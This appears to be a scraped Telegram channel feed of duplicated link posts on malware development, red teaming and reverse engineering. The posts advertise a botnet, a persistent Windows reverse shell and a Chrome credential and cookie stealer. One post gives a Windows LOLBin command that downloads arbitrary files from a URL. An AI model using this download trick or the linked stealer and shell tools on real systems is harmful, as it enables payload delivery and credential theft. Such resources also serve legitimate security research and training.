HTTP Botnet designed to replicate a full weaponized commercial botnet.
Link
#malware_dev
------------------
@islemolecule_source
Link
#malware_dev
------------------
@islemolecule_source
😁2👍1
🔥2👍1
persistent reverse shell for windows
Link
#windows
#malware_dev
----------------------
@islemolecule_source
Link
#windows
#malware_dev
----------------------
@islemolecule_source
🔥4
Malware and cryptography 24: encrypt/decrypt file via Madryga. Simple C/C++ example.
Link
#malware_dev
----------------------
@islemolecule_source
Link
#malware_dev
----------------------
@islemolecule_source
🔥3👍2
FREE comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures.
Link
#reverse
----------------------
@islemolecule_source
Link
#reverse
----------------------
@islemolecule_source
👍1🔥1
🔥2👍1
List of awesome reverse engineering resources
Link
#reverse
----------------------
@islemolecule_source
Link
#reverse
----------------------
@islemolecule_source
⚡1👍1
🍾2👍1
This repository helps you to acquire knowledge of software engineering by self-reading and using free resources if you did not go to university.
language : persian
https://github.com/kalagar/computer-science-university-alternative?tab=readme-ov-file
language : persian
https://github.com/kalagar/computer-science-university-alternative?tab=readme-ov-file
❤4👍1
a great series for learning Linux kernel exploitation
CVE-2017-11176 (UaF in mq_notify function)
Credit: @LexfoSecurite
[ 1 ] blog.lexfo.fr/cve-2017-11176…
[ 2 ] blog.lexfo.fr/cve-2017-11176…
[ 3 ] blog.lexfo.fr/cve-2017-11176…
[ 4 ] blog.lexfo.fr/cve-2017-11176…
#CVE , #analysis , #old_but_gold
——-
@islemolecule_source
CVE-2017-11176 (UaF in mq_notify function)
Credit: @LexfoSecurite
[ 1 ] blog.lexfo.fr/cve-2017-11176…
[ 2 ] blog.lexfo.fr/cve-2017-11176…
[ 3 ] blog.lexfo.fr/cve-2017-11176…
[ 4 ] blog.lexfo.fr/cve-2017-11176…
#CVE , #analysis , #old_but_gold
——-
@islemolecule_source
👍4
Loading DLLs without LoadLibraryA. Instead we'll leverage the VEH (Vectored Exception Handler) to modify the context, especially RIP and RCX to hold the LoadLibraryA address and it's argument.
Link
#malware_dev
———
@islemolecule_source
Link
#malware_dev
———
@islemolecule_source
🔥3❤1👍1🤡1
🔥3👍1
👍3🔥1
👍3
LOLBin for Downloading Arbitrary Files
Find the downloaded file in
#windows
#redteam
#lolbin
———
@islemolecule_source
C:\Windows\System32\IME\SHARED\IMEWDBLD.exe <URL>Find the downloaded file in
%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>#windows
#redteam
#lolbin
———
@islemolecule_source
👍2🔥2
"GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems."
Link
#linux
#redteam
#lolbin
———
@islemolecule_source
Link
#linux
#redteam
#lolbin
———
@islemolecule_source
👍3
PS_Automation_Scripting.pdf
16.3 MB
"PowerShell Automation and Scripting for Cybersecurity: Hacking and defense for red and blue teamers", 2023.
#powershell
———
@islemolecule_source
#powershell
———
@islemolecule_source
👏4
Simple password/cookies/history/bookmarks stealer/dumper for chrome all version
Link
#malware_dev
———
@islemolecule_source
Link
#malware_dev
———
@islemolecule_source
Download Reverse engineering, windows programming, internals,etc..
Link
#windows #reverse #programming #internals
———
@islemolecule_source
Link
#windows #reverse #programming #internals
———
@islemolecule_source